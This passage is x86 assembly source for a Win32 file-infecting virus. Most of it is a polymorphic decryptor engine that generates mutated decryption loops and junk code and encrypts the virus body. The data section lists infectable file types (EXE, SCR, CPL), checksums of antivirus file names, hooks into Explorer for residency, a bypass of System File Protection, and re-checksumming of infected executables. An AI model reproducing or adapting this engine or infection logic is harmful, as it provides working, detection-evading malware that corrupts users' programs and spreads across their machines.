fixed_size2ecx: mov eax,dword ptr [ebp+SizeCrypt]
xor ecx,ecx
mov cl,byte ptr [ebp+oper_size]
shr ecx,01h
or ecx,ecx
jz ok_2ecx
shr eax,cl
jnc ok_2ecx
inc eax
ok_2ecx: mov ecx,eax
ret

;============================================================================
;Generate polymorphic decryptor... Whats new on this poly engine?
;
;On entry:
; esi -> Pointer to code
; edi -> Where to generate polymorphic decryptor
; ecx -> Size of area to encrypt
; edx -> Entry point to code once decrypted
;On exit:
; ecx -> Decryptor size
; edi -> End of decryptor
;
;============================================================================

Mutate: push ebx ;Save base address
add edx,ebx
mov dword ptr [ebp+PtrToEP],edx ;Save ptr to entry-point

mov dword ptr [ebp+PtrToCrypt],esi ;Save crypt offset
mov dword ptr [ebp+PtrToDecrypt],edi
mov dword ptr [ebp+SizeCrypt],ecx ;Save size of block

lea esi,dword ptr [ebp+tbl_startup]
lea edi,dword ptr [ebp+tbl_regs+REG_FLAGS]
mov ecx,00000007h
loop_init_regs: lodsb
stosb
inc edi
loop loop_init_regs

xor eax,eax
mov byte ptr [ebp+NumberOfDataAreas],al ;Clear # of data area
mov byte ptr [ebp+recursive_level],al ;Clear recursive

mov ecx,NUM_DA
lea edi,dword ptr [ebp+tbl_data_area] ;Init data areas
loop_init_da: stosd
stosd
loop loop_init_da

call get_valid_reg
mov al,byte ptr [ebx+REG_MASK]
mov byte ptr [ebp+index_mask],al
or byte ptr [ebx+REG_FLAGS],REG_IS_INDEX

xor eax,eax
mov ecx,00000005h
lea edi,dword ptr [ebp+style_table+00000004h]
clear_style: stosd
add edi,00000004h
loop clear_style

call get_valid_reg
mov al,byte ptr [ebx+REG_MASK]
mov byte ptr [ebp+counter_mask],al
or byte ptr [ebx+REG_FLAGS],REG_IS_COUNTER

call get_rnd32
and eax,00000001h
jz ok_disp
call get_rnd32
ok_disp: mov dword ptr [ebp+ptr_disp],eax

call get_rnd32
mov dword ptr [ebp+crypt_key],eax

call get_rnd32
mov byte ptr [ebp+build_flags],al

call get_rnd32
and al,03h
cmp al,01h
je get_size_ok
cmp al,02h
je get_size_ok
inc al
get_size_ok: mov byte ptr [ebp+oper_size],al

mov edi,dword ptr [ebp+PtrToDecrypt];Ptr to decryptor

call gen_rnd_block ;Random data block
mov ecx,00000005h ;Generate 5 routines

do_subroutine: push ecx

routine_done: mov eax,00000005h ;Random step
call get_rnd_range
lea esi,dword ptr [ebp+style_table+eax*08h]

xor edx,edx ;Already generated?
cmp dword ptr [esi+00000004h],edx
jne routine_done

push edi ;Generate routine
call GenGarbageEx
lodsd
pop dword ptr [esi]
add eax,ebp
call eax
call GenGarbageEx

call gen_ret

call gen_rnd_block

pop ecx ;Generate next subroutine
loop do_subroutine

mov dword ptr [ebp+entry_point],edi ;Decryptor entry-point

;============================================================
;If this is the 1st decryptor we need to save
;some regs
;============================================================

cmp byte ptr [ebp+IsFirst],00h
je SkipSaveRegs

mov al,REG_READ_ONLY

or byte ptr [ebp+tbl_reg_ebx+01h],al
or byte ptr [ebp+tbl_reg_esi+01h],al
or byte ptr [ebp+tbl_reg_edi+01h],al
or byte ptr [ebp+tbl_reg_ebp+01h],al

mov byte ptr [ebp+recursive_level],04h

mov ecx,00000004h
lea esi,dword ptr [ebp+PshPStepIndex]
DoRestorePush: push ecx
push esi

call GenInitGarbage

pop esi

lodsd
lea edx,dword ptr [ebp+eax+TblDoPush]
mov al,byte ptr [edx]
stosb
mov dl,not REG_READ_ONLY

TryToFixEBX: cmp al,053h
jne TryToFixESI

and byte ptr [ebp+tbl_reg_ebx+01h],dl
jmp ShitIsFixed

TryToFixESI: cmp al,056h
jne TryToFixEDI

and byte ptr [ebp+tbl_reg_esi+01h],dl
jmp ShitIsFixed

TryToFixEDI: cmp al,057h
jne TryToFixEBP

and byte ptr [ebp+tbl_reg_edi+01h],dl
jmp ShitIsFixed

TryToFixEBP: cmp al,055h
jne ShitIsFixed

and byte ptr [ebp+tbl_reg_ebp+01h],dl

ShitIsFixed: pop ecx

loop DoRestorePush

mov byte ptr [ebp+recursive_level],00h

and byte ptr [ebp+tbl_reg_ebx+01h],dl
and byte ptr [ebp+tbl_reg_esi+01h],dl
and byte ptr [ebp+tbl_reg_edi+01h],dl
and byte ptr [ebp+tbl_reg_ebp+01h],dl

;============================================================
;Build the JZ/JNZ instruction (at the end of the decryptor
;loop) at runtime
;============================================================

SkipSaveRegs: call GenGarbageEx

test byte ptr [ebp+build_flags],CRYPT_FOG
jz NoEndFog

FuckFogEBP: call get_valid_reg
cmp byte ptr [ebx+REG_MASK],00000101b
je FuckFogEBP

or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

mov dword ptr [ebp+XrndReg],ebx

push ebx

mov al,byte ptr [ebx+REG_MASK]
or al,0B8h
stosb
call get_rnd32
stosd
mov dword ptr [ebp+Xrnd1],eax

call GenGarbageEx

mov dword ptr [ebp+XrndFixPtr],edi
add edi,00000006h

call gen_garbage

mov dword ptr [ebp+XrndMath],edi
add edi,00000006h

pop ebx

xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

call gen_garbage

;============================================================
;Generate CALLs to each routine inside garbage code
;============================================================

NoEndFog: lea esi,dword ptr [ebp+style_table+00000004h]
mov ecx,00000005h

do_call: push ecx ;Gen CALL to each step
cmp ecx,00000003h
jne is_not_loop
call GenGarbageEx
mov dword ptr [ebp+loop_point],edi
is_not_loop: call GenGarbageEx

call get_rnd32
and al,01h
jz MutateCall

StandardCall: mov al,0E8h ;CALL opcode
stosb
lodsd
sub eax,edi
sub eax,00000004h
stosd
jmp DoneMutateCall

CallStepADD: mov ax,0C081h
or ah,byte ptr [ebx+REG_MASK]
stosw
lodsd
call FromPoly2Rva
sub eax,edx
stosd
ret

CallStepSUB: mov ax,0E881h
or ah,byte ptr [ebx+REG_MASK]
stosw
lodsd
call FromPoly2Rva
neg eax
add eax,edx
stosd
ret

CallStepXOR: mov ax,0F081h
or ah,byte ptr [ebx+REG_MASK]
stosw
lodsd
call FromPoly2Rva
xor eax,edx
stosd
ret

MutateCall: push esi
call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
call get_rnd32
stosd
push eax
push ebx
call GenGarbageEx
pop ebx
mov eax,NumCallStep
call get_rnd_range
lea esi,dword ptr [ebp+tbl_call_step+eax*04h]
lodsd
add eax,ebp
pop edx
pop esi
push ebx
call eax
call GenGarbageEx
pop ebx
mov ax,0D0FFh
or ah,byte ptr [ebx+REG_MASK]
stosw
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

DoneMutateCall: call GenGarbageEx
lodsd
pop ecx
loop do_call

call GenGarbageEx ;End condition
call gen_loop
call gen_rnd_block

pop ebx

push edi
sub edi,dword ptr [ebp+PtrToDecrypt]
push edi

mov edi,dword ptr [ebp+PtrToCrypt]
add edi,ebx
call fixed_size2ecx ;Encrypt requested area
loop_hide_code: push ecx
mov eax,dword ptr [edi]
call perform_crypt
xor ecx,ecx
mov cl,byte ptr [ebp+oper_size]
loop_copy_res: stosb
shr eax,08h
loop loop_copy_res
pop ecx
loop loop_hide_code

mov edx,dword ptr [ebp+entry_point]

sub edx,ebx ;Get entry-point offset

pop ecx
pop edi

ret

;============================================================================
;Poly engine initialized data
;============================================================================

;============================================================
;Register table
;
; 00h -> BYTE -> Register mask
; 01h -> BYTE -> Register flags
;============================================================

tbl_regs equ $

db 00000000b,REG_READ_ONLY ;eax
tbl_reg_ebx db 00000011b,00h ;ebx
db 00000001b,00h ;ecx
db 00000010b,00h ;edx
tbl_reg_esi db 00000110b,REG_NO_8BIT ;esi
tbl_reg_edi db 00000111b,REG_NO_8BIT ;edi
tbl_reg_ebp db 00000101b,REG_NO_8BIT ;ebp

end_regs equ $

;============================================================
;Aliases for reg table structure
;============================================================

REG_MASK equ 00h
REG_FLAGS equ 01h

;============================================================
;Bit aliases for reg flags
;============================================================

REG_IS_INDEX equ 01h ;Register used as main index register
REG_IS_COUNTER equ 02h ;This register is used as loop counter
REG_READ_ONLY equ 04h ;Never modify the value of this register
REG_NO_8BIT equ 08h ;ESI EDI and EBP havent 8bit version

;============================================================
;Initial reg flags
;============================================================

tbl_startup equ $

db REG_READ_ONLY ;eax
db 00h ;ebx
db 00h ;ecx
db 00h ;edx
db REG_NO_8BIT ;esi
db REG_NO_8BIT ;edi
db REG_NO_8BIT ;ebp

;============================================================
;Code that does not disturb reg values
;============================================================

tbl_save_code equ $

clc
stc
cmc
cld
std

end_save_code equ $

;============================================================
;Generators for [reg] indexing mode
;============================================================

tbl_idx_reg equ $

dd offset xx_inc_reg
dd offset xx_dec_reg
dd offset xx_not_reg
dd offset xx_add_reg
dd offset xx_sub_reg
dd offset xx_xor_reg

;============================================================
;Generators for [reg+imm] indexing mode
;============================================================

tbl_dis_reg equ $

dd offset yy_inc_reg
dd offset yy_dec_reg
dd offset yy_not_reg
dd offset yy_add_reg
dd offset yy_sub_reg
dd offset yy_xor_reg

;============================================================
;Generators for [reg+reg] indexing mode
;============================================================

tbl_xtended equ $

dd offset zz_inc_reg
dd offset zz_dec_reg
dd offset zz_not_reg
dd offset zz_add_reg
dd offset zz_sub_reg
dd offset zz_xor_reg

;============================================================
;Generators for [reg+reg+imm] indexing mode
;============================================================

tbl_paranoia equ $

dd offset ii_inc_reg
dd offset ii_dec_reg
dd offset ii_not_reg
dd offset ii_add_reg
dd offset ii_sub_reg
dd offset ii_xor_reg

;============================================================
;Opcodes for math reg,imm
;============================================================

tbl_math_imm equ $

db 0C0h ;add
db 0C8h ;or
db 0E0h ;and
db 0E8h ;sub
db 0F0h ;xor
db 0D0h ;adc
db 0D8h ;sbb

end_math_imm equ $

;============================================================
;Magic aliases
;============================================================

MAGIC_PUTKEY equ 01h
MAGIC_PUTDISP equ 02h
MAGIC_ENDSTR equ 0FFh
MAGIC_ENDKEY equ 0FEh
MAGIC_CAREEBP equ 00h
MAGIC_NOTEBP equ 0FFh

;============================================================
;Magic data
;============================================================

xx_inc_reg db 0FEh
db MAGIC_CAREEBP
db 00h
db 00h
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword

xx_dec_reg db 0FEh
db MAGIC_CAREEBP
db 08h
db 00h
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword

xx_not_reg db 0F6h
db MAGIC_CAREEBP
db 10h
db 00h
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword

xx_add_reg db 80h
db MAGIC_CAREEBP
db 00h
db MAGIC_PUTKEY
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword

xx_sub_reg db 80h
db MAGIC_CAREEBP
db 28h
db MAGIC_PUTKEY
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword

xx_xor_reg db 80h
db MAGIC_CAREEBP
db 30h
db MAGIC_PUTKEY
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword

yy_inc_reg db 0FEh
db MAGIC_NOTEBP
db 80h
db MAGIC_PUTDISP
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword

yy_dec_reg db 0FEh
db MAGIC_NOTEBP
db 88h
db MAGIC_PUTDISP
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword

yy_not_reg db 0F6h
db MAGIC_NOTEBP
db 90h
db MAGIC_PUTDISP
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword

yy_add_reg db 80h
db MAGIC_NOTEBP
db 80h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword

yy_sub_reg db 80h
db MAGIC_NOTEBP
db 0A8h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword

yy_xor_reg db 80h
db MAGIC_NOTEBP
db 0B0h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword

zz_inc_reg db 0FEh
db MAGIC_CAREEBP
db 04h
db 00h
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword

zz_dec_reg db 0FEh
db MAGIC_CAREEBP
db 0Ch
db 00h
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword

zz_not_reg db 0F6h
db MAGIC_CAREEBP
db 14h
db 00h
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword

zz_add_reg db 80h
db MAGIC_CAREEBP
db 04h
db MAGIC_PUTKEY
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword

zz_sub_reg db 80h
db MAGIC_CAREEBP
db 2Ch
db MAGIC_PUTKEY
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword

zz_xor_reg db 80h
db MAGIC_CAREEBP
db 34h
db MAGIC_PUTKEY
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword

ii_inc_reg db 0FEh
db MAGIC_NOTEBP
db 84h
db MAGIC_PUTDISP
dd offset x_inc_reg_byte
dd offset x_inc_reg_word
dd offset x_inc_reg_dword

ii_dec_reg db 0FEh
db MAGIC_NOTEBP
db 8Ch
db MAGIC_PUTDISP
dd offset x_dec_reg_byte
dd offset x_dec_reg_word
dd offset x_dec_reg_dword

ii_not_reg db 0F6h
db MAGIC_NOTEBP
db 94h
db MAGIC_PUTDISP
dd offset x_not_reg_byte
dd offset x_not_reg_word
dd offset x_not_reg_dword

ii_add_reg db 80h
db MAGIC_NOTEBP
db 84h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_add_reg_byte
dd offset x_add_reg_word
dd offset x_add_reg_dword

ii_sub_reg db 80h
db MAGIC_NOTEBP
db 0ACh
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_sub_reg_byte
dd offset x_sub_reg_word
dd offset x_sub_reg_dword

ii_xor_reg db 80h
db MAGIC_NOTEBP
db 0B4h
db MAGIC_PUTKEY or MAGIC_PUTDISP
dd offset x_xor_reg_byte
dd offset x_xor_reg_word
dd offset x_xor_reg_dword

;============================================================
;Reverse-code strings
;============================================================

x_inc_reg_byte db 02h,0FEh,0C8h,MAGIC_ENDSTR
x_inc_reg_word db 02h,66h,48h,MAGIC_ENDSTR
x_inc_reg_dword db 01h,48h,MAGIC_ENDSTR
x_dec_reg_byte db 02h,0FEh,0C0h,MAGIC_ENDSTR
x_dec_reg_word db 02h,66h,40h,MAGIC_ENDSTR
x_dec_reg_dword db 01h,40h,MAGIC_ENDSTR
x_not_reg_byte db 02h,0F6h,0D0h,MAGIC_ENDSTR
x_not_reg_word db 03h,66h,0F7h,0D0h,MAGIC_ENDSTR
x_not_reg_dword db 02h,0F7h,0D0h,MAGIC_ENDSTR
x_add_reg_byte db 01h,2Ch,MAGIC_ENDKEY
x_add_reg_word db 02h,66h,2Dh,MAGIC_ENDKEY
x_add_reg_dword db 01h,2Dh,MAGIC_ENDKEY
x_sub_reg_byte db 01h,04h,MAGIC_ENDKEY
x_sub_reg_word db 02h,66h,05h,MAGIC_ENDKEY
x_sub_reg_dword db 01h,05h,MAGIC_ENDKEY
x_xor_reg_byte db 01h,34h,MAGIC_ENDKEY
x_xor_reg_word db 02h,66h,35h,MAGIC_ENDKEY
x_xor_reg_dword db 01h,35h,MAGIC_ENDKEY

;============================================================
;Format for each style-table entry:
;
; 00h -> DWORD -> Address of generator
; 04h -> DWORD -> Address of generated subroutine or
; 00000000h if not yet generated
;
;============================================================

style_table equ $

dd offset gen_load_ptr
dd 00000000h

dd offset gen_load_ctr
dd 00000000h

dd offset gen_decrypt
dd 00000000h

dd offset gen_next_step
dd 00000000h

dd offset gen_next_ctr
dd 00000000h

;============================================================
;Generators for incrementing the index register
;============================================================

tbl_idx_up equ $

dd offset IdxUpWithADD
dd offset IdxUpWithSUB
dd offset IdxUpWithINC
dd offset IdxUpADDADD
dd offset IdxUpADDSUB
dd offset IdxUpSUBSUB
dd offset IdxUpSUBADD

NumIdxUp equ ($-tbl_idx_up)/04h

;============================================================
;Misc generators
;============================================================

tbl_jmp_end equ $

dd offset jmpendregadd
dd offset jmpendregsub
dd offset jmpendregxor

NumJmpEnd equ ($-tbl_jmp_end)/04h

tbl_call_step equ $

dd offset CallStepADD
dd offset CallStepSUB
dd offset CallStepXOR

NumCallStep equ ($-tbl_call_step)/04h

TblDoFog equ $

dd offset DoFogAdd
dd offset DoFogSub
dd offset DoFogXor

NumFog equ ($-TblDoFog)/04h

TblFixFog equ $

dd offset FixFogAdd
dd offset FixFogSub
dd offset FixFogXor

NumFixFog equ ($-TblFixFog)/04h

;============================================================
;Generators for decrementing the index register
;============================================================

tbl_idx_down equ $

dd offset IdxDownWithADD
dd offset IdxDownWithSUB
dd offset IdxDownWithDEC
dd offset IdxDownADDADD
dd offset IdxDownADDSUB
dd offset IdxDownSUBSUB
dd offset IdxDownSUBADD

NumIdxDown equ ($-tbl_idx_down)/04h

;============================================================
;Garbage code generators
;============================================================

tbl_i_g equ $

dd offset gen_save_code ;clc stc cmc cld std
dd offset gen_mov_mem32 ;mov mem,reg32
dd offset gen_mov_mem16 ;mov mem,reg16
dd offset gen_mov_mem8 ;mov mem,reg8
dd offset gen_add_mem32 ;add mem,reg32
dd offset gen_add_mem16 ;add mem,reg16
dd offset gen_add_mem8 ;add mem,reg8
dd offset gen_sub_mem32 ;sub mem,reg32
dd offset gen_sub_mem16 ;sub mem,reg16
dd offset gen_sub_mem8 ;sub mem,reg8
dd offset gen_adc_mem32 ;adc mem,reg32
dd offset gen_adc_mem16 ;adc mem,reg16
dd offset gen_adc_mem8 ;adc mem,reg8
dd offset gen_sbb_mem32 ;sbb mem,reg32
dd offset gen_sbb_mem16 ;sbb mem,reg16
dd offset gen_sbb_mem8 ;sbb mem,reg8
dd offset gen_or_mem32 ;or mem,reg32
dd offset gen_or_mem16 ;or mem,reg16
dd offset gen_or_mem8 ;or mem,reg8
dd offset gen_and_mem32 ;and mem,reg32
dd offset gen_and_mem16 ;and mem,reg16
dd offset gen_and_mem8 ;and mem,reg8
dd offset gen_xor_mem32 ;xor mem,reg32
dd offset gen_xor_mem16 ;xor mem,reg16
dd offset gen_xor_mem8 ;xor mem,reg8

end_i_g equ $

tbl_garbage equ $

dd offset gen_save_code ;clc stc cmc cld std
dd offset g_movreg32imm ;mov reg32,imm
dd offset g_movreg16imm ;mov reg16,imm
dd offset g_movreg8imm ;mov reg8,imm
dd offset g_xchgregreg32 ;xchg reg32,reg32
dd offset g_xchgregreg16 ;xchg reg16,reg16
dd offset g_xchgregreg8 ;xchg reg8,reg8
dd offset g_movregreg32 ;mov reg32,reg32
dd offset g_movregreg16 ;mov reg16,reg16
dd offset g_movregreg8 ;mov reg8,reg8
dd offset g_inc_reg32 ;inc reg32
dd offset g_inc_reg16 ;inc reg16
dd offset g_inc_reg8 ;inc reg8
dd offset g_dec_reg32 ;dec reg32
dd offset g_dec_reg16 ;dec reg16
dd offset g_dec_reg8 ;dec reg8
dd offset g_mathregimm32 ;math reg32,imm
dd offset g_mathregimm16 ;math reg16,imm
dd offset g_mathregimm8 ;math reg8,imm
dd offset g_movzx_movsx ;movzx/movsx reg32,reg16

save_space equ $

dd offset gen_mov_mem32 ;mov mem,reg32
dd offset gen_mov_mem16 ;mov mem,reg16
dd offset gen_mov_mem8 ;mov mem,reg8
dd offset gen_add_mem32 ;add mem,reg32
dd offset gen_add_mem16 ;add mem,reg16
dd offset gen_add_mem8 ;add mem,reg8
dd offset gen_sub_mem32 ;sub mem,reg32
dd offset gen_sub_mem16 ;sub mem,reg16
dd offset gen_sub_mem8 ;sub mem,reg8
dd offset gen_adc_mem32 ;adc mem,reg32
dd offset gen_adc_mem16 ;adc mem,reg16
dd offset gen_adc_mem8 ;adc mem,reg8
dd offset gen_sbb_mem32 ;sbb mem,reg32
dd offset gen_sbb_mem16 ;sbb mem,reg16
dd offset gen_sbb_mem8 ;sbb mem,reg8
dd offset gen_or_mem32 ;or mem,reg32
dd offset gen_or_mem16 ;or mem,reg16
dd offset gen_or_mem8 ;or mem,reg8
dd offset gen_and_mem32 ;and mem,reg32
dd offset gen_and_mem16 ;and mem,reg16
dd offset gen_and_mem8 ;and mem,reg8
dd offset gen_xor_mem32 ;xor mem,reg32
dd offset gen_xor_mem16 ;xor mem,reg16
dd offset gen_xor_mem8 ;xor mem,reg8
dd offset g_push_g_pop ;push reg/garbage/pop reg
dd offset g_call_cont ;call/garbage/pop
dd offset g_jump_u ;jump/rnd block
dd offset g_jump_c ;jump conditional/garbage
dd offset gen_fake_crypt ;fake decryptor instruction

end_garbage equ $

;============================================================
;PolyPush
;============================================================

TblDoPush equ $

pushEBX db 053h
pushESI db 056h
pushEDI db 057h
pushEBP db 055h

;============================================================
;PolyPop
;============================================================

TblDoPop equ $

popEBX db 05Dh
popESI db 05Fh
popEDI db 05Eh
popEBP db 05Bh

;============================================================================
;CRC32 of API names
;============================================================================

CrcKernel32 dd 00000000h ;CRC32 of KERNEL dll name

CrcGetProcAddr dd 00000000h ;This API takes special care

CRC32K32Apis dd NumK32Apis dup (00000000h)
CRC32TOOLHELPApis dd NumTOOLHELPApis dup (00000000h)
CRC32PSAPIApis dd NumPSAPIApis dup (00000000h)
CRC32IMGHLPApis dd NumIMGHLPApis dup (00000000h)
CRC32SFCApis dd NumSFCApis dup (00000000h)
CRC32USER32Apisw9x dd NumUSER32Apis dup (00000000h)
CRC32USER32Apiswnt dd NumUSER32Apis dup (00000000h)

CRC32_IsDebugPr dd 00000000h
CRC32_RegServProc dd 00000000h

;============================================================================
;CRC32 of infectable file extensions
;============================================================================

TblCRC32szEXT equ $

CRC32_szEXE dd 00000000h
CRC32_szSCR dd 00000000h
CRC32_szCPL dd 00000000h

NumberOfExt equ ($-TblCRC32szEXT)/04h

;============================================================================
;CRC32 of EXPLORER.EXE and USER32.DLL
;============================================================================

CRCszEXPLORER dd 00000000h
CRCszUSER32 dd 00000000h
CRCszPSAPI dd 00000000h
CRCszIMGHLP dd 00000000h
CRCszSFC dd 00000000h

;============================================================================
;Avoid some files from being infected
;============================================================================

avoid_tbl dd avoid_num dup (00000000h)

;============================================================================
;CRC32 of AV files
;============================================================================

TblCRC32AV dd NumberOfAV dup (00000000h)

;============================================================================
;End of CRC32 protected area
;============================================================================

SizeOfProtect equ $-CRC_protected

;============================================================================
;End of virus image in files
;============================================================================

inf_size equ $-viro_sys

;============================================================================
;Seed for random number generator
;============================================================================

rnd32_seed dd 00000000h

;============================================================================
;CRC32 lookup table
;============================================================================

tbl_crc32 dd 0100h dup (00000000h)

;============================================================================
;KERNEL32 API's
;============================================================================

;GetProcAddress API takes special care

a_GetProcAddress dd 00000000h

epK32Apis equ $

a_CreateFileA dd 00000000h
a_CreateFileMappingA dd 00000000h
a_CreateProcessA dd 00000000h
a_CreateThread dd 00000000h
a_CloseHandle dd 00000000h
a_DeleteFileA dd 00000000h
a_ExitThread dd 00000000h
a_FindClose dd 00000000h
a_FindFirstFileA dd 00000000h
a_FindNextFileA dd 00000000h
a_FreeLibrary dd 00000000h
a_GetComputerNameA dd 00000000h
a_GetCurrentProcess dd 00000000h
a_GetDriveTypeA dd 00000000h
a_GetFileAttributesA dd 00000000h
a_GetLastError dd 00000000h
a_GetLocalTime dd 00000000h
a_GetLogicalDriveStringsA dd 00000000h
a_GetSystemDirectoryA dd 00000000h
a_GetVersionEx dd 00000000h
a_LoadLibraryA dd 00000000h
a_MapViewOfFile dd 00000000h
a_OpenFileMappingA dd 00000000h
a_OpenProcess dd 00000000h
a_ReadProcessMemory dd 00000000h
a_SetEndOfFile dd 00000000h
a_SetFileAttributesA dd 00000000h
a_SetFilePointer dd 00000000h
a_SetFileTime dd 00000000h
a_Sleep dd 00000000h
a_UnmapViewOfFile dd 00000000h
a_WriteProcessMemory dd 00000000h

NumK32Apis equ ($-epK32Apis)/04h

;Only used when present

a_IsDebuggerPresent dd 00000000h

hKERNEL32 dd 00000000h

;============================================================================
;Used to check current computer name
;============================================================================

SizeOfComputerName dd 00000000h

szComputerName db 20h dup (00h)

;============================================================================
;Buffer used on misc routines
;============================================================================

EP_Bytes dd 00000000h

BufStrFilename db MAX_PATH+01h dup (00000000h)

;============================================================================
;End of virus virtual image
;============================================================================

size_virtual equ $-viro_sys

;============================================================================
;Structure used by GetVersionEx
;============================================================================

system_version equ $

dwOSVersionInfoSize dd 00000000h
dwMajorVersion dd 00000000h
dwMinorVersion dd 00000000h
dwBuildNumber dd 00000000h
dwPlatformId dd 00000000h

szCSDVersion db 80h dup (00h)

VER_PLATFORM_WIN32s equ 00h
VER_PLATFORM_WIN32_WINDOWS equ 01h
VER_PLATFORM_WIN32_NT equ 02h

;============================================================================
;Variables used by the Windows 9x residency routines
;============================================================================

hSnapshot dd 00000000h

ProcessEntry equ $

ProcEdwSize dd 00000000h
ProcEcntUsage dd 00000000h
ProcEth32ProcessID dd 00000000h
ProcEth32DefaultHeapID dd 00000000h
ProcEth32ModuleID dd 00000000h
ProcEcntThreads dd 00000000h
ProcEth32ParentProcessID dd 00000000h
ProcEpcPriClassBase dd 00000000h
ProcEdwFlags dd 00000000h
ProcEszExeFile db MAX_PATH dup (00h)

SIZEOFPROCESSENTRY equ ($-ProcessEntry)

ModuleEntry equ $

ModEdwSize dd 00000000h
ModEth32ModuleID dd 00000000h
ModEth32ProcessID dd 00000000h
ModEGlblcntUsage dd 00000000h
ModEProccntUsage dd 00000000h
ModEmodBaseAddr dd 00000000h
ModEmodBaseSize dd 00000000h
ModEhModule dd 00000000h
ModEszModule db MAX_MODULE_NAME32+1 dup (00h)
ModEszExePath db MAX_PATH dup (00h)

SIZEOFMODULEENTRY equ ($-ModuleEntry)

MAX_MODULE_NAME32 equ 255

;============================================================================
;Variables used by the Windows NT and Windows 2000 residency routines
;============================================================================

hProcess dd 00000000h
hModule dd 00000000h

ProcessIdList dd 20h dup (00000000h)
ModuleList dd 20h dup (00000000h)

Explorer_MZ_lfanew dd 00000000h
Explorer_FH_SizeOfOptionalHeader dw 0000h
Explorer_FH_NumberOfSections dw 0000h

Explorer_SectionHeader db IMAGE_SIZEOF_SECTION_HEADER dup (00h)

Explorer_DE_Import dd 00000000h

Explorer_ImportDescriptor db IMAGE_SIZEOF_IMPORT_DESCRIPTOR dup (00h)

Explorer_ID_Name db 10h dup (00h)
ParseDllNameErrorProtection db 00h

Explorer_Hook dd 00000000h
Explorer_Patch dd 00000000h
Explorer_Init_Hook dd 00000000h

;============================================================================
;This is virus infection thread ID
;============================================================================

IF_ThreadID dd 00000000h

;============================================================================
;This is used to locate system DLL files and load them without using names,
;only by means of CRC32
;============================================================================

a_SDLL_CRC32 dd 00000000h

szSYSTEMDIR db MAX_PATH dup (00h)

;============================================================================
;TOOLHELP API's (Windows 9x only)
;============================================================================

epTOOLHELPApis equ $

a_CreateToolhelp32Snapshot dd 00000000h
a_Process32First dd 00000000h
a_Process32Next dd 00000000h
a_Module32First dd 00000000h
a_Module32Next dd 00000000h

NumTOOLHELPApis equ ( $-epTOOLHELPApis)/04h

;============================================================================
;PSAPI API's (Windows NT & Windows 2000 only)
;============================================================================

epPSAPIApis equ $

a_EnumProcessModules dd 00000000h
a_EnumProcesses dd 00000000h
a_GetModuleBaseNameA dd 00000000h
a_GetModuleInformation dd 00000000h

NumPSAPIApis equ ($-epPSAPIApis)/04h

hPSAPI dd 00000000h

;============================================================================
;IMAGEHLP APIs used to compute new image checksum
;============================================================================

epIMGHLPApis equ $

a_CheckSumMappedFile dd 00000000h

NumIMGHLPApis equ ($-epIMGHLPApis)/04h

hIMGHLP dd 00000000h

;============================================================================
;SFC APIs used by the virus to avoid Windows 2000 System File Protection
;============================================================================

epSFCApis equ $

a_SfcIsFileProtected dd 00000000h

NumSFCApis equ ($-epSFCApis)/04h

hSFC dd 00000000h

;============================================================================
;USER32 APIs ( The address is for the Ansi version if the target is running
;windows 9x or the Wide version if running windows Nt ) .
;============================================================================

epUSER32Apis equ $

a_DefWindowProc dd 00000000h

NumUSER32Apis equ ($-epUSER32Apis)/04h

hUSER32 dd 00000000h

;============================================================================
;Handles over target files
;============================================================================

h_CreateFile dd 00000000h
h_FileMap dd 00000000h

;============================================================================
;Misc variables
;============================================================================

CurFileAttr dd 00000000h
ChecksumPE dd 00000000h
OldChecksum dd 00000000h
map_is_here dd 00000000h
FileImport dd 00000000h
ImportSH dd 00000000h
inject_offs dd 00000000h
vir_offset dd 00000000h
search_raw dd 00000000h
host_base dd 00000000h
virus_sh dd 00000000h
fix_size dd 00000000h
raw_align dd 00000000h
K32CodeStart dd 00000000h
K32CodeEnd dd 00000000h

;============================================================================
;Poly engine uninitialized data
;============================================================================

CRYPT_DIRECTION equ 01h
CRYPT_CMPCTR equ 02h
CRYPT_CDIR equ 04h
CRYPT_SIMPLEX equ 10h
CRYPT_COMPLEX equ 20h
CRYPT_FOG equ 40h

PtrToCrypt dd 00000000h ;Pointer to area to encrypt
PtrToDecrypt dd 00000000h ;Where to generate polymorphic decryptor
PtrToEP dd 00000000h ;Pointer to code entry-point once decrypted
SizeCrypt dd 00000000h ;Size of area to encrypt
end_value dd 00000000h ;Index end value
loop_point dd 00000000h ;Start address of decryption loop
entry_point dd 00000000h ;Entry point to decryptor code
decryptor_size dd 00000000h ;Size of generated decryptor
disp2disp dd 00000000h ;Displacement over displacement
condition_ptr dd 00000000h ;Pointer to JZ/JNZ instruction at loop end

Xrnd1 dd 00000000h
